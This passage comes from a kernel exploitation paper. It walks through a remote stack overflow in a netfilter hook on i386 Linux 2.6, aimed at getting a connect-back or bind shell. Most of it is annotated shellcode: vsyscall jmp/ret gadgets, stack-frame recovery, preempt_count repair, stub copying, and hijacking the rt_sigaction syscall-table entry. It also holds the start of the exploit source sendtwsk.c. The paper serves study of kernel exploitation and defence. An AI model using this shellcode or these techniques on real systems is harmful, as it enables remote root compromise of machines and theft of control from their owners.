    orig_dev=0xc1224400) at net/ipv4/ip_input.c:348
#4  0xc02a5432 in netif_receive_skb (skb=0xc1bc4a40) at
#5  0xc024d3c2 in rtl8139_rx (dev=0xc1224400, tp=0xc1224660, budget=64)
    at drivers/net/8139too.c:2030
#6  0xc024d70e in rtl8139_poll (dev=0xc1224400, budget=0xc1721b78)
    at drivers/net/8139too.c:2120
#7  0xc02a5633 in net_rx_action (h=0xc0417078) at net/core/dev.c:1739
#8  0xc0118a75 in __do_softirq () at kernel/softirq.c:95
#9  0xc0118aba in do_softirq () at kernel/softirq.c:129                [3]
#10 0xc0118b7d in irq_exit () at kernel/softirq.c:169
#11 0xc0104212 in do_IRQ (regs=0xc1721ad0) at arch/i386/kernel/irq.c:110
#12 0xc0102b0a in common_interrupt () at current.h:9
#13 0x0000110b in ?? ()
Our vulnerable function (just like any other hook) is called serially by
the nf_iterate one [1], during the processing of a softirq [3], through
the netfilter core interface nf_hook_slow [2]. 
It is installed in the INPUT chain and, thus, it starts processing packets
whenever they are sent to the host box, as we see from [2] where pf = 2
(PF_INET) and hook = 1 (NF_IP_LOCAL_IN). 

Our final goal is to execute some kind of code that will estabilish a
connection back to us (or bind a port to a shell, or whatever kind of
shellcoding you like more for your remote exploit). Trying to execute it
directly from kernel land is obviously a painful idea so we need to hijack
some userland process (remember that we are on top of a softirq, so we
have no clue about what's really beneath us; it could equally be a kernel
thread or the idle task, for example) as our victim, to inject some code
inside and force the kernel to call it later on, when we're out of an
asyncronous event.

That means that we need an intermediary step between taking the control
over the flow at 'softirq time' and execute from the userland process. 
But let's go on order, first of all we need to _start executing_ at least
the entry point of our shellcode. 

As it is nowadays used in many exploit that have to fight against address
space randomization in the absence of infoleaks, we look for a jump to a 
jmp *%esp or push reg/ret or call reg sequence, to start executing from a
known point.
To avoid guessing the right return value a nop-alike padding of
ret-into-ret addresses can be used. But we still need to find those
opcodes in a 'fixed' and known place.

The 2.6. branch of kernel introduced a fixed page [*] for the support of
the 'sysenter' instruction, the 'vsyscall' one :

bfe37000-bfe4d000 rwxp bfe37000 00:00 0          [stack]
ffffe000-fffff000 ---p 00000000 00:00 0          [vdso]

which is located at a fixed address : 0xffffe000 - 0xfffff000. 

[*] At time of release this is no more true on latest kernels, since the
    address of the vsyscall page is randomized starting from the 2.6.18 
The 'vsyscall' page is a godsend for our 'entry point' shellcode, since we
can locate inside it the required opcodes [*] to start executing : 

(gdb) x/i 0xffffe75f
0xffffe75f:     jmp    *%esp
(gdb) x/i 0xffffe420
0xffffe420:     ret

[*] After testing on a wide range of kernels/compilers the addresses of 
    those opcodes we discovered that sometimes they were not in the
    expected place or, even, in one case, not present. This could be the
    only guessing part you could be facing (also due to vsyscall
    randomization, as we said in the note before), but there are
    (depending on situations) other possibilities [fixed start of the
    kernel image, fixed .text of the 'running process' if out of interrupt 
    context, etc].

To better figure out how the layout of the stack should be after the
overflow, here there's a small schema :

|             |
|             |
| JMP -N      |-------+     # N is the size of the buffer plus some bytes
|             |       |       (ret-to-ret chain + jmp space)
|             |       |
| ret-to-jmp  |<-+    |     # the address of the jmp *%esp inside vsyscall
|             |  |    |
| .........   | -+    |
|             |  |    |
| ret-to-ret  | -+    |     # the address of 'ret' inide vsyscall 
|             |  |    |
| ret-to-ret  | -+    |
|             |       |
| overwritten |       |     # ret-to-ret padding starting from there
| ret address |       |
|             |       |
|             |       |
|      ^      |       |
|      |      |       |     # shellcode is placed inside the buffer
|             |       |       because it's huge, but it could also be
|  shellcode  |       |       splitted before and after the ret addr.
|   nop       |       |
|   nop       |<------+
At that point we control the flow, but we're still inside the softirq, so
we need to perform a couple of tasks to cleanly get our connect back
shellcode executed :

  - find a way to cleanly get out from the softirq, since we trashed the 
  - locate the resource management objects that have been modified (if
    the've been) and restore them to a safe state
  - find a place where we can store our shellcode untill later execution 
    from a 'process context' kernel path.
  - find a way to force the before mentioned kernel path to execute our

The first step is the most difficult one (and wasn't necessary in the
madwifi exploit, since we weren't in interrupt context), because we've
overwritten the original return pointer and we have no clue about the
kernel text layout and addresses.

We're going now to present tecniques and a working shellcode for each one
of the above points. [ Note that we have mentioned them in a 'conceptual
order of importance', which is different from the real order that we use
inside the exploit. More precisely, they are almost in reverse order,
since the last step performed by our shellcode is effectively getting out
from the softirq. We felt that approach more well-explanatory, just
remember that note during the following sub-chapters] 

------[ 3.2.2 - Stack Frame Flow Recovery   

The goal of this tecnique is to unroll the stack, looking for some known
pattern and trying to reconstruct a caller stack frame, register status
and instruction pointing, just to continue over with the normal flow. 
We need to restore the stack pointer to a known and consistent state,
restore register contents so that the function flow will exit cleanily and
restore any lock or other syncronization object that was modified by the
functions among the one we overflowed in and the one we want to 'return

Our stack layout (as seen from the dump pasted above) would basically be
that one :

stack layout
+---------------------+   bottom of stack
|                     |
| do_softirq()        |
| ..........          |             /* nf_hook_slow() stack frame */
| ..........          |             +------------------------+
|                     |             |  argN                  |
|                     |             |  ...                   |
| ip_rcv              |             |  arg2                  |
| nf_hook_slow        | =========>  |  arg1                  |
| ip_rcv_finish       |             |  ret-to-(ip_rcv())     |
| nf_iterate          |             |  saved reg1            |
|                     |             |  saved reg2            |
|                     |             |  ......                |
| ..............      |             +------------------------+
| ..............      |
| process_twsk_chunk  |
|                     |
+---------------------+  top of stack

As we said, we need to locate a function in the previous stack frames, not
too far from our overflowing one, having some 'good pattern' that would
help us in our search.
Our best bet, in that situation, is to check parameter passing : 

#2  0xc02b51b9 in nf_hook_slow (pf=2, hook=1, pskb=0xc1721ad0,
indev=0xc1224400, outdev=0x0, ....)

The 'nf_hook_slow()' function has a good 'signature' :              

  -  two consecutive dwords 0x00000002 and 0x00000002
  -  two kernel pointers (dword > 0xC0000000)
  -  a following NULL dword

We can relay on the fact that this pattern would be a constant, since
we're in the INPUT chain, processing incoming packets, and thus always
having a NULL 'outdev', pf = 2 and hook = 1.
Parameters passing is logically not the only 'signature' possible :
depending on situations you could find a common pattern in some local
variable (which would be even a better one, because we discovered that
some versions of GCC optimize out some parameters, passing them through

Scanning backward the stack from the process_twsk_chunk() frame up to
the nf_hook_slow() one, we can later set the %esp value to the place where 
is saved the return address of nf_hook_slow(), and, once recreated the 
correct conditions, perform a 'ret' that would let us exit cleanily.
We said 'once recreated the correct conditions' because the function could
expect some values inside registers (that we have to set) and could expect
some 'lock' or 'preemption set' different from the one we had at time of
overflowing. Our task is thus to emulate/restore all those requirements.

To achieve that, we can start checking how gcc restores registers during
function epilogue :

c02b6b30 <nf_hook_slow>:
c02b6b30:       55                      push   %ebp
c02b6b31:       57                      push   %edi
c02b6b32:       56                      push   %esi
c02b6b33:       53                      push   %ebx
c02b6bdb:       89 d8                   mov    %ebx,%eax
c02b6bdd:       5a                      pop    %edx       ==+
c02b6bde:       5b                      pop    %ebx         |
c02b6bdf:       5e                      pop    %esi         | restore
c02b6be0:       5f                      pop    %edi         |
c02b6be1:       5d                      pop    %ebp        =+
c02b6be2:       c3                      ret

This kind of epilogue, which is common for non-short functions let us
recover the state of the saved register. Once we have found the 'ret'
value on the stack we can start 'rolling back' counting how many 'pop' are
there inside the text to correctly restore those register. [*]

[*] This is logically not the only possibility, one could set directly the
    values via movl, but sometimes you can't use 'predefined' values for
    those register. As a side note, some versions of the gcc compiler
    don't use the push/pop prologue/epilogue, but translate the code as a
    sequence of movl (which need a different handling from the shellcode).      
To correctly do the 'unrolling' (and thus locate the pop sequence), we
need the kernel address of 'nf_hook_slow()'. This one is not hard to
calculate since we have already found on the stack its return addr (thanks
to the signature pointed out before). Once again is the intel calling
procedures convention which help us :

c02bc8bd:       6a 02                   push   $0x2
c02bc8bf:       e8 6c a2 ff ff          call   c02b6b30 <nf_hook_slow>
c02bc8c4:       83 c4 1c                add    $0x1c,%esp

That small snippet of code is taken from ip_rcv(), which is the function
calling nf_hook_slow(). We have found on the stack the return address,
which is 0xc02bc8c4, so calculating the nf_hook_slow address is just a
matter of calculating the 'displacement' used in the relative call (opcode
0xe8, the standard calling convention on kernel gcc-compiled code) and
adding it to the return addr value (INTEL relative call convention adds
the displacement to the current EIP) : 

[*] call to nf_hook_slow -> 0xe8 0x6c 0x2a 0xff 0xff 
[*] nf_hook_slow address -> 0xc02bc8c4 + 0xffffa26c = 0xc02b6b30 

To better understand the whole Stack Frame Flow Recovery approach here's
the shellcode stub doing it, with short comments :

 - Here we increment the stack pointer with the 'pop %eax' sequence and
   test for the known signature [ 0x2 0x1 X X 0x0 ].

"\x58"                  // pop    %eax
"\x83\x3c\x24\x02"      // cmpl   $0x2,(%esp)
"\x75\xf9"              // jne    loop
"\x83\x7c\x24\x04\x01"  // cmpl   $0x1,0x4(%esp)
"\x75\xf2"              // jne    loop
"\x83\x7c\x24\x10\x00"  // cmpl   $0x0,0x10(%esp)
"\x75\xeb"              // jne    loop
"\x8d\x64\x24\xfc"      // lea    0xfffffffc(%esp),%esp
 - get the return address, subtract 4 bytes and deference the pointer to get
   the nf_hook_slow() offset/displacement. Add it to the return address to
   obtain the nf_hook_slow() address. 

"\x8b\x04\x24"          // mov    (%esp),%eax
"\x89\xc3"              // mov    %eax,%ebx
"\x03\x43\xfc"          // add    0xfffffffc(%ebx),%eax

 - locate the 0xc3 opcode inside nf_hook_slow(), eliminating 'spurious'
   0xc3 bytes. In this shellcode we do a simple check for 'movl' opcodes
   and that's enough to avoid 'false positive'. With a larger shellcode
   one could write a small disassembly routine that would let perform a
   more precise locating of the 'ret' and 'pop' [see later]. 

"\x40"                  // inc    %eax
"\x8a\x18"              // mov    (%eax),%bl
"\x80\xfb\xc3"          // cmp    $0xc3,%bl
"\x75\xf8"              // jne    increment
"\x80\x78\xff\x88"      // cmpb   $0x88,0xffffffff(%eax)
"\x74\xf2"              // je     increment
"\x80\x78\xff\x89"      // cmpb   $0x89,0xffffffff(%eax)
"\x74\xec"              // je     8048351 increment

 - roll back from the located 'ret' up to the last pop instruction, if 
   any and count the number of 'pop's.  
"\x31\xc9"              // xor    %ecx,%ecx
"\x48"                  // dec    %eax
"\x8a\x18"              // mov    (%eax),%bl
"\x80\xe3\xf0"          // and    $0xf0,%bl
"\x80\xfb\x50"          // cmp    $0x50,%bl
"\x75\x03"              // jne    end
"\x41"                  // inc    %ecx
"\xeb\xf2"              // jmp    pop
"\x40"                  // inc    %eax

 - use the calculated byte displacement from ret to rollback %esp value

"\x89\xc6"              // mov    %eax,%esi
"\x31\xc0"              // xor    %eax,%eax
"\xb0\x04"              // mov    $0x4,%al
"\xf7\xe1"              // mul    %ecx
"\x29\xc4"              // sub    %eax,%esp

 - set the return value 

"\x31\xc0"              // xor    %eax,%eax

 - call the nf_hook_slow() function epilog
"\xff\xe6"              // jmp    *%esi

It is now time to pass to the 'second step', that is restore any pending
lock or other synchronization object to a consistent state for the
nf_hook_slow() function. 

---[ 3.2.3 - Resource Restoring 

At that phase we care of restoring those resources that are necessary for
the 'hooked return function' (and its callers) to cleanly get out from the
softirq/interrupt state. 

Let's take another (closer) look at nf_hook_slow() : 

< linux-2.6.15/net/netfilter/core.c >

int nf_hook_slow(int pf, unsigned int hook, struct sk_buff **pskb,
                 struct net_device *indev,
                 struct net_device *outdev,
                 int (*okfn)(struct sk_buff *),
                 int hook_thresh)
        struct list_head *elem;
        unsigned int verdict;
        int ret = 0;

        /* We may already have this, but read-locks nest anyway */
        rcu_read_lock();		[1]

        rcu_read_unlock();		[2]
        return ret;			[3]

< / >

At [1] 'rcu_read_lock()' is invoked/acquired, but [2] 'rcu_read_unlock()'
is never performed, since at the 'Stack Frame Flow Recovery' step we
unrolled the stack and jumped back at [3]. 

'rcu_read_unlock()' is just an alias of preempt_enable(), which, in the 
end, results in a one-decrement of the preempt_count value inside the
thread_info struct :

< linux-2.6.15/include/linux/rcupdate.h >

#define rcu_read_lock()         preempt_disable()


#define rcu_read_unlock()       preempt_enable()

< / >

< linux-2.6.15/include/linux/preempt.h >

# define add_preempt_count(val) do { preempt_count() += (val); } while (0)
# define sub_preempt_count(val) do { preempt_count() -= (val); } while (0)


#define inc_preempt_count() add_preempt_count(1)
#define dec_preempt_count() sub_preempt_count(1)

#define preempt_count() (current_thread_info()->preempt_count)


asmlinkage void preempt_schedule(void);

#define preempt_disable() \
do { \
        inc_preempt_count(); \
        barrier(); \
} while (0)

#define preempt_enable_no_resched() \
do { \
        barrier(); \
        dec_preempt_count(); \
} while (0)

#define preempt_check_resched() \
do { \
        if (unlikely(test_thread_flag(TIF_NEED_RESCHED))) \
                preempt_schedule(); \
} while (0)

#define preempt_enable() \
do { \
        preempt_enable_no_resched(); \
        barrier(); \
        preempt_check_resched(); \
} while (0)


#define preempt_disable()               do { } while (0)
#define preempt_enable_no_resched()     do { } while (0)
#define preempt_enable()                do { } while (0)
#define preempt_check_resched()         do { } while (0)

< / >   

As you can see, if CONFIG_PREEMPT is not set, all those operations are 
just no-ops. 'preempt_disable()' is nestable, so it can be called multiple
times (preemption will be disabled untill we call 'preempt_enable()' the 
same number of times). That means that, given a PREEMPT kernel, we should
find a value equal or greater to '1' inside preempt_count at 'exploit
time'. We can't just ignore that value or otherwise we'll BUG() later on
inside scheduler code (check preempt_schedule_irq() in kernel/sched.c). 

What we have to do, on a PREEMPT kernel, is thus locate 'preempt_count'
and decrement it, just like 'rcu_read_unlock()' would do. 
For the x86 architecture , 'preempt_count' is stored inside the 'struct 
thread_info' : 

< linux-2.6.15/include/asm-i386/thread_info.h >

struct thread_info {
        struct task_struct      *task;          /* main task structure */
        struct exec_domain      *exec_domain;   /* execution domain */
        unsigned long           flags;          /* low level flags */
        unsigned long           status;         /* thread-synchronous
flags */
        __u32                   cpu;            /* current CPU */
        int                     preempt_count;  /* 0 => preemptable, <0 =>
BUG */

        mm_segment_t            addr_limit;     /* thread address space:
                                                   0-0xBFFFFFFF for
                                                   0-0xFFFFFFFF for

< / >

Let's see how we get to it : 

 - locate the thread_struct 

"\x89\xe0"                 // mov %esp,%eax
"\x25\x00\xe0\xff\xff"     // and $0xffffe000,%eax

 - scan the thread_struct to locate the addr_limit value. This value is a
   good fingerprint, since it is 0xc0000000 for an userland process and  
   0xffffffff for a kernel thread (or the idle task). [note that this kind 
   of scan can be used to figure out in which kind of process we are, 
   something that could be very important in some scenario] 

/* scan: */
"\x83\xc0\x04"             // add $0x4,%eax
"\x8b\x18"                 // mov (%eax),%ebx
"\x83\xfb\xff"             // cmp $0xffffffff,%ebx
"\x74\x0a"                 // je 804851e <end>
"\x81\xfb\x00\x00\x00\xc0" // cmp $0xc0000000,%ebx
"\x74\x02"                 // je 804851e <end>
"\xeb\xec"                 // jmp 804850a <scan>

 - decrement the 'preempt_count' value [which is just the member above the
   addr_limit one] 

/* end: */
"\xff\x48\xfc"             // decl 0xfffffffc(%eax)

To improve further the shellcode it would be a good idea to perform a test
over the preempt_count value, so that we would not end up into lowering it
below zero. 

---[ 3.2.4 - Copying the Stub 

We have just finished presenting a generic method to restore the stack
after a 'general mess-up' of the netfilter core call-frames. 
What we have to do now is to find some place to store our shellcode, since
we can't (as we said before) directly execute from inside interrupt
context. [remember the note, this step and the following one are executed
before getting out from the softirq context]. 

Since we don't know almost anything about the remote kernel image memory
mapping we need to find a 'safe place' to store the shellcode, that is, we
need to locate some memory region that we can for sure reference and that
won't create problems (read : Oops) if overwritten. 

There are two places where we can copy our 'stage-2' shellcode :

  - IDT (Interrupt Descriptor Table) : we can easily get the IDT logical
    address at runtime (as we saw previously in the NULL dereference
    example) and Linux uses only the 0x80 software interrupt vector : 

    | exeption        |
    |    entries      |
    |  hw interrupt   |
    |      entries    |
    |-----------------| entry #32 ==+
    |                 |             |
    |  soft interrupt |             |
    |      entries    |             | usable gap
    |                 |             |
    |                 |             |
    |                 |           ==+
    |  int 0x80       | entry #128
    |                 |
    +-----------------+ <- offset limit
    Between entry #32 and entry #128 we have all unused descriptor
    entries, each 8 bytes long. Linux nowadays doesn't map that memory
    area as read-only [as it should be], so we can write on it [*]. 	
    We have thus : (128 - 32) * 8 = 98 * 8 = 784 bytes, which is enough 
    for our 'stage-2 shellcode'. 

    [*] starting with the Linux kernel 2.6.20 it is possible to map some
        areas as read-only [the idt is just one of those]. Since we don't
        'start' writing into the IDT area and executing from there, it is
        possible to bypass that protection simply modifying directly
        kernel page tables protection in 'previous stages' of the

  - the current kernel stack : we need to make a little assumption here,
    that is being inside a process that would last for some time (untill
    we'll be able to redirect kernel code over our shellcode, as we will
    see in the next section). 
    Usually the stack doesn't grow up to 4kb, so we have an almost free 
    4kb page for us (given that the remote system is using an 8kb stack
    space). To be safe, we can leave some pad space before the shellcode. 
    We need to take care of the 'struct thread_struct' saved at the
    'bottom' of the kernel stack (and that logically we don't want to
    overwrite ;) ) :

    | thread_struct   |
    |---------------- |  ==+
    |                 |    | usable gap
    |                 |    |
    |-----------------|  ==+
    |                 |
    |       ^         |
    |       |         |  [ normally the stack doesn't ]
    |       |         |  [ grow over 4kb              ]
    |                 |
    |  ring0 stack    |
    Alltogether we have : (8192 - 4096) - sizeof(descriptor) - pad ~= 2048
    bytes, which is even more than before. 
    With a more complex shellcode we can traverse the process table and
    look forward for a 'safe process' (init, some kernel thread, some main
    server process). 

Let's give a look to the shellcode performing that task : 

 - get the stack address where we are [the uber-famous call/pop trick]

"\xe8\x00\x00\x00\x00"         //  call   51 <search+0x29>
"\x59"                         //  pop    %ecx
 - scan the stack untill we find the 'start marker' of our stage-2 stub. 
   We put a \xaa byte at the start of it, and it's the only one present in
   the shellcode. The addl $10 is there just to start scanning after the
   'cmp $0xaa, %al', which would otherwise give a false positive for \xaa.

"\x83\xc1\x10"                 //  addl $10, %ecx
"\x41"                         //  inc    %ecx
"\x8a\x01"                     //  mov    (%ecx),%al
"\x3c\xaa"                     //  cmp    $0xaa,%al
"\x75\xf9"                     //  jne    52 <search+0x2a>

 - we have found the start of the shellcode, let's copy it in the 'safe
   place' untill the 'end marker' (\xbb). The 'safe place' here is saved
   inside the %esi register. We haven't shown how we calculated it because
   it directly derives from the shellcode used in the next section (it's
   simply somwhere in the stack space). This code could be optimized by
   saving the 'stage-2' stub size in %ecx and using rep/repnz in
   conjuction with mov instructions. 

"\x41"                         //  inc    %ecx
"\x8a\x01"                     //  mov    (%ecx),%al
"\x88\x06"                     //  mov    %al,(%esi)
"\x46"                         //  inc    %esi
"\x41"                         //  inc    %ecx
"\x80\x39\xbb"                 //  cmpb   $0xbb,(%ecx)
"\x75\xf5"                     //  jne    5a <search+0x32>
   [during the develop phase of the exploit we have changed a couple of
    times the 'stage-2' part, that's why we left that kind of copy
    operation, even if it's less elegant :) ]

---[ 3.2.5 - Executing Code in Userspace Context [Gimme Life!] 

Okay, we have a 'safe place', all we need now is a 'safe moment', that is
a process context to execute in. The first 'easy' solution that could come
to your mind could be overwriting the #128 software interrupt [int $0x80],
so that it points to our code. The first process issuing a system call
would thus become our 'victim process-context'.
This approach has, thou, two major drawbacks : 
  - we have no way to intercept processes using sysenter to access kernel
    space (what if all were using it ? It would be a pretty odd way to

  - we can't control which process is 'hooked' and that might be
    'disastrous' if the process is the init one or a critical one,
    since we'll borrow its userspace to execute our shellcode (a bindshell
    or a connect-back is not a short-lasting process).  

We have to go a little more deeper inside the kernel to achieve a good
hooking. Our choice was to use the syscall table and to redirect a system
call which has an high degree of possibility to be called and that we're
almost sure that isn't used inside init or any critical process. 
Our choice, after a couple of tests, was to hook the rt_sigaction syscall,
but it's not the only one. It just worked pretty well for us. 

To locate correctly in memory the syscall table we use the stub of code
that sd and devik presented in their phrack paper [23] about /dev/kmem 

 - we get the current stack address, calculate the start of the
   thread_struct and we add 0x1000 (pad gap) [simbolic value far enough
   from both the end of the thread_struct and the top of stack]. Here is
   where we set that %esi value that we have presented as 'magically
   already there' in the shellcode-part discussed before.

"\x89\xe6"                     //  mov    %esp,%esi
"\x81\xe6\x00\xe0\xff\xff"     //  and    $0xffffe000,%esi
"\x81\xc6\x00\x10\x00\x00"     //  add    $0x1000,%esi

 - sd & devik sligthly re-adapted code.

"\x0f\x01\x0e"                 //  sidtl  (%esi)
"\x8b\x7e\x02"                 //  mov    0x2(%esi),%edi
"\x81\xc7\x00\x04\x00\x00"     //  add    $0x400,%edi
"\x66\x8b\x5f\x06"             //  mov    0x6(%edi),%bx
"\xc1\xe3\x10"                 //  shl    $0x10,%ebx
"\x66\x8b\x1f"                 //  mov    (%edi),%bx
"\x43"                         //  inc    %ebx
"\x8a\x03"                     //  mov    (%ebx),%al
"\x3c\xff"                     //  cmp    $0xff,%al
"\x75\xf9"                     //  jne    28 <search>
"\x8a\x43\x01"                 //  mov    0x1(%ebx),%al
"\x3c\x14"                     //  cmp    $0x14,%al
"\x75\xf2"                     //  jne    28 <search>
"\x8a\x43\x02"                 //  mov    0x2(%ebx),%al
"\x3c\x85"                     //  cmp    $0x85,%al
"\x75\xeb"                     //  jne    28 <search>
"\x8b\x5b\x03"                 //  mov    0x3(%ebx),%ebx 

- logically we need to save the original address of the syscall somewhere,
  and we decided to put it just before the 'stage-2' shellcode : 

 "\x81\xc3\xb8\x02\x00\x00"     //  add 0x2b8, %ebx       
 "\x89\x5e\xf8"                 //  movl %ebx, 0xfffffff8(%esi) 
 "\x8b\x13"                     //  mov    (%ebx),%edx
 "\x89\x56\xfc"                 //  mov    %edx,0xfffffffc(%esi)
 "\x89\x33"                     //  mov    %esi,(%ebx)

As you see, we save the address of the rt_sigaction entry [offset 0x2b8]
inside syscall table (we will need it at restore time, so that we won't
have to calculate it again) and the original address of the function
itself (the above counterpart in the restoring phase). We make point the
rt_sigaction entry to our shellcode : %esi. Now it should be even clearer
why, in the previous section, we had ''magically'' the destination address
to copy our stub into in %esi.    

The first process issuing a rt_sigaction call will just give life to the
stage-2 shellcode, which is the final step before getting the connect-back
or the bindshell executed. [or whatever shellcode you like more ;) ]
We're still in kerneland, while our final goal is to execute an userland
shellcode, so we still have to perform a bounch of operations. 

There are basically two methods (not the only two, but probably the easier
and most effective ones) to achieve our goal : 

  - find saved EIP, temporary disable WP control register flag, copy
    the userland shellcode overthere and re-enable WP flag [it could be 
    potentially dangerous on SMP]. If the syscall is called through
    sysenter, the saved EIP points into vsyscall table, so we must 'scan'
    the stack 'untill ret' (not much different from what we do in the
    stack frame recovery step, just easier here), to get the real
    userspace saved EIP after vsyscall 'return' : 

    0xffffe410 <__kernel_vsyscall+16>:      pop    %ebp
    0xffffe411 <__kernel_vsyscall+17>:      pop    %edx
    0xffffe412 <__kernel_vsyscall+18>:      pop    %ecx
    0xffffe413 <__kernel_vsyscall+19>:      ret

    As you can see, the first executed userspace address (writable) is at
    saved *(ESP + 12).

  - find saved ESP or use syscall saved parameters pointing to an userspace
    buffer, copy the shellcode in that memory location and overwrite the
    saved EIP with saved ESP (or userland buffer address)

The second method is preferable (easier and safer), but if we're dealing
with an architecture supporting the NX-bit or with a software patch that
emulates the execute bit (to mark the stack and eventually the heap as
non-executable), we have to fallback to the first, more intrusive, method,
or our userland process will just segfault while attempting to execute the
shellcode. Since we do have full control of the process-related kernel 
data we can also copy the shellcode in a given place and modify page
protection. [not different from the idea proposed above for IDT read-only 
in the 'Copy the Stub' section]

Once again, let's go on with the dirty details : 

 - the usual call/pop trick to get the address we're executing from 

"\xe8\x00\x00\x00\x00"         //  call   8 <func+0x8>
"\x59"                         //  pop    %ecx
 - patch back the syscall table with the original rt_sigaction address
   [if those 0xff8 and 0xffc have no meaning for you, just remember that we 
    added 0x1000 to the thread_struct stack address to calculate our 'safe
    place' and that we stored just before both the syscall table entry 
    address of rt_sigaction and the function address itself]

"\x81\xe1\x00\xe0\xff\xff"     //  and    $0xffffe000,%ecx
"\x8b\x99\xf8\x0f\x00\x00"     //  mov    0xff8(%ecx),%ebx
"\x8b\x81\xfc\x0f\x00\x00"     //  mov    0xffc(%ecx),%eax
"\x89\x03"                     //  mov    %eax,(%ebx)

 - locate Userland ESP and overwrite Userland EIP with it [method 2] 

"\x8b\x74\x24\x38"             //  mov    0x38(%esp),%esi
"\x89\x74\x24\x2c"             //  mov    %esi,0x2c(%esp)
"\x31\xc0"                     //  xor    %eax,%eax

 - once again we use a marker (\x22) to locate the shellcode we want to
   copy on process stack. Let's call it 'stage-3' shellcode. 
   We use just another simple trick here to locate the marker and avoid a
   false positive : instead of jumping after (as we did for the \xaa one)
   we set the '(marker value) - 1' in %al and then increment it. 
   The copy is exactly the same (with the same 'note') we saw before 

"\xb0\x21"                     //  mov    $0x21,%al
"\x40"                         //  inc    %eax
"\x41"                         //  inc    %ecx
"\x38\x01"                     //  cmp    %al,(%ecx)
"\x75\xfb"                     //  jne    2a <func+0x2a>
"\x41"                         //  inc    %ecx
"\x8a\x19"                     //  mov    (%ecx),%bl
"\x88\x1e"                     //  mov    %bl,(%esi)
"\x41"                         //  inc    %ecx
"\x46"                         //  inc    %esi
"\x38\x01"                     //  cmp    %al,(%ecx)
"\x75\xf6"                     //  jne    30 <func+0x30>

 - return from the syscall and let the process cleanly exit to userspace.
   Control will be transfered to our modified EIP and shellcode will be

"\xc3"                         //  ret

We have used a 'fixed' value to locate userland ESP/EIP, which worked well
for the 'standard' kernels/apps we tested it on (getting to the syscall via 
int $0x80). With a little more effort (worth the time) you can avoid those
offset assumptions by implementing a code similar to the one for the Stack
Frame Recovery tecnique. 
Just take a look to how current userland EIP,ESP,CS and SS are saved
before jumping at kernel level :

ring0 stack:
| SS     |  
| ESP    |  <--- saved ESP
| EFLAG  |
| CS     |  
| EIP    |  <--- saved EIP
|......  |

All 'unpatched' kernels will have the same value for SS and CS and we can
use it as a fingerprint to locate ESP and EIP (that we can test to be
below PAGE_OFFSET [*]) 

[*] As we already said, on latest kernels there could be a different
    uspace/kspace split address than 0xc0000000 [2G/2G or 1G/3G 

We won't show here the 'stage-3' shellcode since it is a standard
'userland' bindshell one. Just use the one you need depending on the

---[ 3.2.6 - The Code : sendtwsk.c

< stuff/expl/sendtwsk.c > 

#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netinet/ip.h>
#include <netinet/udp.h>

/* from vuln module */
#define MAX_TWSKCHUNK 30
/* end */

#define NOP 0x90

#define OVERFLOW_NEED   20

#define JMP           "\xe9\x07\xfe\xff\xff"
#define SIZE_JMP      (sizeof(JMP) -1)

#define TWSK_PACKET_LEN (((MAX_TWSKCHUNK * sizeof(struct twsk_chunk)) +
                         + sizeof(struct twsk) + sizeof(struct iphdr))

#define TWSK_PROTO 37

#define DEFAULT_VSYSCALL_RET 0xffffe413
#define DEFAULT_VSYSCALL_JMP 0xc01403c0

 *  find the correct value..
alpha:/usr/src/linux/debug/article/remote/figaro/ip_figaro# ./roll
val: 2147483680, 80000020 result: 512
val: 2147483681, 80000021 result: 528

#define NEGATIVE_CHUNK_NUM 0x80000020

char shellcode[]=
/* hook sys_rtsigaction() and copy the 2level shellcode (72) */

 "\x90\x90"                     //  nop; nop; [alignment]
 "\x89\xe6"                     //  mov    %esp,%esi
 "\x81\xe6\x00\xe0\xff\xff"     //  and    $0xffffe000,%esi
 "\x81\xc6\x00\x10\x00\x00"     //  add    $0x1000,%esi
 "\x0f\x01\x0e"                 //  sidtl  (%esi)
 "\x8b\x7e\x02"                 //  mov    0x2(%esi),%edi
 "\x81\xc7\x00\x04\x00\x00"     //  add    $0x400,%edi
 "\x66\x8b\x5f\x06"             //  mov    0x6(%edi),%bx
 "\xc1\xe3\x10"                 //  shl    $0x10,%ebx
 "\x66\x8b\x1f"                 //  mov    (%edi),%bx
 "\x43"                         //  inc    %ebx
 "\x8a\x03"                     //  mov    (%ebx),%al
 "\x3c\xff"                     //  cmp    $0xff,%al
 "\x75\xf9"                     //  jne    28 <search>
 "\x8a\x43\x01"                 //  mov    0x1(%ebx),%al
 "\x3c\x14"                     //  cmp    $0x14,%al
 "\x75\xf2"                     //  jne    28 <search>
 "\x8a\x43\x02"                 //  mov    0x2(%ebx),%al
 "\x3c\x85"                     //  cmp    $0x85,%al
 "\x75\xeb"                     //  jne    28 <search>
 "\x8b\x5b\x03"                 //  mov    0x3(%ebx),%ebx [get

 "\x81\xc3\xb8\x02\x00\x00"     //  add 0x2b8, %ebx       [get
sys_rt_sigaction offset]
 "\x89\x5e\xf8"                 //  movl %ebx, 0xfffffff8(%esi) [save

 "\x8b\x13"                     //  mov    (%ebx),%edx
 "\x89\x56\xfc"                 //  mov    %edx,0xfffffffc(%esi)
 "\x89\x33"                     //  mov    %esi,(%ebx)    [make
sys_rt_sigaction point to our shellcode]

 "\xe8\x00\x00\x00\x00"         //  call   51 <search+0x29>
 "\x59"                         //  pop    %ecx
 "\x83\xc1\x10"                 //  addl $10, %ecx
 "\x41"                         //  inc    %ecx
 "\x8a\x01"                     //  mov    (%ecx),%al
 "\x3c\xaa"                     //  cmp    $0xaa,%al
 "\x75\xf9"                     //  jne    52 <search+0x2a>
 "\x41"                         //  inc    %ecx
 "\x8a\x01"                     //  mov    (%ecx),%al
 "\x88\x06"                     //  mov    %al,(%esi)
 "\x46"                         //  inc    %esi
 "\x41"                         //  inc    %ecx
 "\x80\x39\xbb"                 //  cmpb   $0xbb,(%ecx)
 "\x75\xf5"                     //  jne    5a <search+0x32>

/* find and decrement preempt counter (32) */

 "\x89\xe0"                     //  mov %esp,%eax
 "\x25\x00\xe0\xff\xff"         //  and $0xffffe000,%eax
 "\x83\xc0\x04"                 //  add $0x4,%eax
 "\x8b\x18"                     //  mov (%eax),%ebx
 "\x83\xfb\xff"                 //  cmp $0xffffffff,%ebx
 "\x74\x0a"                     //  je 804851e <end>
 "\x81\xfb\x00\x00\x00\xc0"     //  cmp $0xc0000000,%ebx
 "\x74\x02"                     //  je 804851e <end>
 "\xeb\xec"                     //  jmp 804850a <scan>
 "\xff\x48\xfc"                 //  decl 0xfffffffc(%eax)

